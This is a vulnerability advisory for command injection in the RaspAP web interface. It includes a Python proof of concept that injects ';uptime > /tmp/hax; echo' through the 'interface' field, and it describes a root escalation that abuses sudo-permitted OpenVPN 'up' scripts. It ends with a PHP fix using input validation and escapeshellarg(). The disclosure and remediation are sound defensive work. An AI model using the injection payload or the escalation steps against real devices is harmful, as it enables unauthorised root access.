Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root privileges.

Affected versions: RaspAP v2.8.9 and older.
Proof of concept (Python 3, requires the third-party requests library):

#!/usr/bin/env python3
# Proof of concept for the command injection in the hostapd_conf form.
import re
import requests

TARGET = "10.3.141.1"       # address of the RaspAP host
CREDS = "admin:secret"      # web interface credentials (HTTP basic auth)
URL = f"http://{CREDS}@{TARGET}/hostapd_conf"

sess = requests.Session()

# Get a valid CSRF token from the form page
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)
print(csrf)

res = sess.post(
    URL,
    data={
        "csrf_token": csrf,
        "txpower": "auto",
        # Command payload is here:
        "interface": ";uptime > /tmp/hax; echo",
    },
)
if res.status_code != 200:
    print("Failed to execute command")
After the script runs, /tmp/hax has been created on the Raspberry Pi and contains the output of uptime.

There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec(). A third instance exists at configure_client.php:20, exploitable in a similar manner.

An authenticated user is able to execute arbitrary commands as www-data.
In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured sudo permissions: overwrite the OpenVPN client configuration to set the following:

script-security 2
up /tmp/payload.sh

and establish an OpenVPN connection. /tmp/payload.sh will then be executed with root privileges.
Apply sanitization to the txpower and interface parameters, and use the PHP built-in escapeshellarg() before passing them to exec().
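A PHP illustration of the recommended fix, added here and not taken from RaspAP's source: a hypothetical handler builds an iwconfig call from the two POST parameters, first in the unsanitized pattern the advisory describes and then with per-parameter validation plus escapeshellarg(). The wrapped command, the function names and the validation patterns are assumptions of this example.

```php
<?php
// Added illustration (not RaspAP's code). Assumed: the handler wraps
// iwconfig; function names and validation patterns are this example's own.

// Vulnerable pattern: POST values are concatenated straight into exec(),
// so a value like ";uptime > /tmp/hax; echo" ends the intended command and
// starts another. Shown for contrast only; never call this with untrusted input.
function set_txpower_vulnerable(array $post): int
{
    exec("iwconfig {$post['interface']} txpower {$post['txpower']}", $out, $status);
    return $status;
}

// Hardened version: validate each parameter against the narrow shape it
// legitimately has, then quote it with escapeshellarg() before exec().
function set_txpower_hardened(array $post): int
{
    $interface = $post['interface'] ?? '';
    $txpower   = $post['txpower'] ?? '';

    // Linux interface names: 1-15 characters from a small safe set.
    if (!preg_match('/^[A-Za-z0-9._-]{1,15}$/', $interface)) {
        throw new InvalidArgumentException('invalid interface name');
    }
    // Allow-list for txpower: "auto", "off" or a one- or two-digit dBm value.
    if (!preg_match('/^(auto|off|[0-9]{1,2})$/', $txpower)) {
        throw new InvalidArgumentException('invalid txpower value');
    }

    // escapeshellarg() single-quotes the value and escapes embedded quotes,
    // so shell metacharacters are passed literally rather than interpreted.
    $cmd = 'iwconfig ' . escapeshellarg($interface)
         . ' txpower ' . escapeshellarg($txpower);
    exec($cmd, $out, $status);
    return $status;
}

// Constructed input: the advisory's payload is rejected before exec() runs.
try {
    set_txpower_hardened(['interface' => ';uptime > /tmp/hax; echo', 'txpower' => 'auto']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . PHP_EOL;
}
```

Validation should come first so that a malformed value is rejected outright; escapeshellarg() is the second layer that keeps any remaining characters from being interpreted by the shell.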